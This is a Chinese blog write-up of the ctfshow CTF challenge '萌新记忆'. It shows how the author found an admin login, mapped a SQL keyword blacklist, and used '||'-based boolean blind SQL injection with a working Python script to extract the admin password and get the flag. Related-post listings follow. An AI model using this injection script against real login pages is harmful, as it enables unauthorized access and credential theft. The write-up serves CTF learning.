ctfshow-萌新记忆

已于 2023-03-18 15:14:15 修改
阅读量481 收藏
点赞数 3
分类专栏: CTF 文章标签: web安全
于 2023-03-18 15:12:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XYH_233/article/details/129637346
版权
萌新赛-萌新记忆
信息收集

首先进去是一堆无用界面,都是静态的图片触发,没有交互,那么必备程序,扫后台,启动dirmap,扫出来了,芜湖~,发现admin界面

在这里插入图片描述

在这里插入图片描述

那么接下来就是抓包分析,登录抓一个包,然后用字典Fuzz,看看有没有SQLi,这里我首先Fuzz密码,发现都是同一回显,恼,但是Fuzz登录名的时候爆出来SQL语句错,嘿嘿,那么肯定是SQLi啦。

在这里插入图片描述

分别有四种回显:我报警了用户···········错误,用户名/密码错误,原生SQL报错

第一种明显就是直接黑名单了,or,select,limit,order by,concat,group_concat,database,....都被过滤掉了

还剩下,updataxml,||,as,',(),

解题

接下来就是探寻如何解题,首先想到报错注入,但是啊,gourp_concat和concat被ban掉了,好像爆不出来,那么按照优先级:union>报错>盲注>时间盲注,那么我们尝试bool盲注,使用||拼接,

尝试payload:admin123'||'1'<'2>=都被ban了,单引号就是为了闭合,在用户名不匹配时,||前面才是false,后面就可以由我们自己产生想要的bool值,如上payload返回:

在这里插入图片描述

我们再构造payload:admin123'||'1'<'1

在这里插入图片描述

可见,产生不同的回显,那么我们就可以编写盲注脚本进行猜解了

首先我们可以确定存在admin用户,那么接下来获取其密码,但是经过多次试验,对payload有长度限制,当输入admin'||length(p)<30'admin'||length(p)<3'的回显不一样,一个会返回用户名错误,一个会返回报错,实际这条SQL语句确实会报错,说明后端对用户名有长度限制,

emmm,无所谓,改一下a'||length(p)<30||',这个为基础先用BP重放得到p字段的长度,<15,<20,<19,<18,<17,最后得到p字段长度为17

下面编写脚本得到密码:

import requests

url='http://d824de54-d045-47c7-a554-dac4d607ed57.challenge.ctf.show/admin/checklogin.php'
#按照ASCII大小排序
str='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
password=''
for j in range(1,18):
    for i in str:
        payload="'||substr(p,%d,1)<'%s"%(j,i)
        data={
            "u":payload,
            "p":1
        }
        resp=requests.post(url=url,data=data)
        # print(resp.text)
        if "密码错误" in resp.text and "用户名" not in resp.text:
            password+=chr(ord(i)-1)
            print(password)
            break
        pass
    pass
print("password:"+password)

最后得到密码:cptbtptpbcptdtptp

登录得flag:ctfshow{9cbc6211-d74d-4ee0-8055-2d434614e27b}

3xsh0re
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-VIP题目-Web-详细解题思路
01-27
ctfshow-VIP题目-Web-详细解题思路
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
记忆打卡100天.pdf
08-16
记忆打开pdf
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
CTFshow——萌新记忆
D.MIND 的博客
03-15 1338
一进来,看了前两篇悲惨记忆,忽记起我还要做题呢,于是赶紧寻找线索… 发现页面都没什么可利用的,尝试访问别的页面,用dirsearch可以扫描出/admin/目录,没错,是扫出目录而不是一个页面,所以访问的时候别忘记admin后面加/ (多么菜的领悟>_<) 来到一个登录页面,随手试试or和and,返回要报警的信息,用burp来Fuzz一下 发现and or # - if =等都被过滤了 但( ) || , substr length可以用,||可以代替or 那么就是bool盲注了 经过尝试是会发
ctfshow 萌新记忆
m0_68074153的博客
08-19 480
bool盲注
CTFSHOW 萌新萌新记忆
chizhaji的博客
02-08 1062
CTFSHOW 萌新萌新记忆 吐槽一下我感觉萌新这个词在侮辱我,我还搞了半天 进去之后查看源代码,把能点的地方都点一下发现没有什么可以搞的,就打开了御剑来扫描了一波,发现了admin目录进去要让我登陆,首先用了一句话,进去看到一个"我要报警了"(因为我比较懒不想一个个试,把抓的包保存下来用sqlmap跑了一下发现注入不成功看来就只能自己一个一个的试试了) 再经过半个多小时的努力之下发现一共有三种报错结果 ①用户名/密码错误:当输入的用户名不为admin且不超过限制的长度时 ②用户名错误:用户名长度超过限
CTFshow-萌新
weixin_51706044的博客
04-10 1800
文章目录萌新_密码2萌新 密码3萌新 隐写2萌新 隐写4萌新 密码#4萌新 隐写3杂项1杂项2萌新 杂项3杂项4杂项5杂项6隐写1隐写2萌新隐写5萌新隐写6 萌新_密码2 那就敲一下键盘试一下,每六个字符一组,你会发现六个字符中间正好包围起来一个字符即所找的flag答案依次拼接:FWY 因此KEY{fwy} 萌新 密码3 解题思路: 一串摩斯电码 看到培根,可以想到培根密码 继续培根解密 培根密码,又名倍康尼密码(英语:Bacon’s cipher)是由法兰西斯·培根发明的一种隐写术。 因此需
ctfshow萌新赛经验总结
m0_62422842的博客
06-05 1677
涉及到的相关知识: sql注入中的sprintf格式化字符串漏洞。 基于约束的sql注入攻击。 利用Burpsuite Fuzz实现sql注入
CTFShow-周末大挑战parse-url篇Writeup
05-19
CTFShow--周末大挑战parse_url篇Writeup
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFshow_萌新解题
ymx520haha的博客
04-24 1332
得到字母,但不是flag,看到作者名字是培根,想到了培根密码,将A替换m,B替换d,AABBABABAAABBBABABBAAAAAAABBABAABBA得到,进行解密得到guowang,改为大写提交flag成功。下载完发现是一个音频文件,用au打开,发现一段长短波,考虑为摩斯(-- ..- --.. .. -.- .. ... --. ----- ----- -..)看代码,发现存在命令执行漏洞,尝试构造得到flag,使用system(“cat config,php”),f12看源码得到flag。
ctfshow 萌xin赛
weixin_63231007的博客
04-25 1520
萌新赛 给她 git源码泄露.得到源码为 <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> 查看别人题解,里写了有关sprintf函数的作用漏洞。从WordPress SQLi谈PHP格式化字符串问题(2017.11.01更新)
ctfshow 萌xin赛misc
Demodd的博客
01-24 749
前言 不想学web的时候,刷misc摸鱼(然后摸的有点久),萌xin赛的题做起来也有点点点点点点费劲。。。 qrcode 打开txt发现txt里只有01查看长度发现是625位,根据题目名称明显是25*25的二维码 from PIL import Image strings = open('qrcode.txt','r').read() print(strings) pic = Image.new("RGB",(25,25)) num = 0 for x in range(25): for y in
ctfshow 萌新web系列--2
qq_61632010的博客
08-25 194
<html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id是否存在 i...
ctfshow-web萌新赛(详解)
m0_63641882的博客
11-06 297
1.addslashes函数+sping的漏洞2.cookie的盗用3.代码审计+正则过滤。
ctfshow 萌新赛 给她
qq_39980334的博客
11-15 1600
.git泄露 sprintf绕过 伪协议
【网络安全的神秘世界】docker搭建pikachu靶场
最新发布
weixin_54750312的博客
05-31 508
再访问80端口,因为默认端口就是80,所以80可省略。可以通过下面命令进入pikachu网站根目录。虽然是404,但实际已经启动好了。点击红色部分,进行安装/初始化。复制命令后,去kali安装。访问本地地址8080端口。
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。而引用中提到,萌新隐写题目可能是纯签到题,可以在公告中找到或者输入萌新码。根据这些信息,我们可以得出结论,ctfshow-__萌新隐写也是CTFShow "萌心区"WP详解(上)中关于隐写的一道题目。 请注意,我无法提供具体的题目内容和解答,因为您没有提供更多细节。如果您需要更详细的答案,请提供更多相关的信息,我将尽力帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值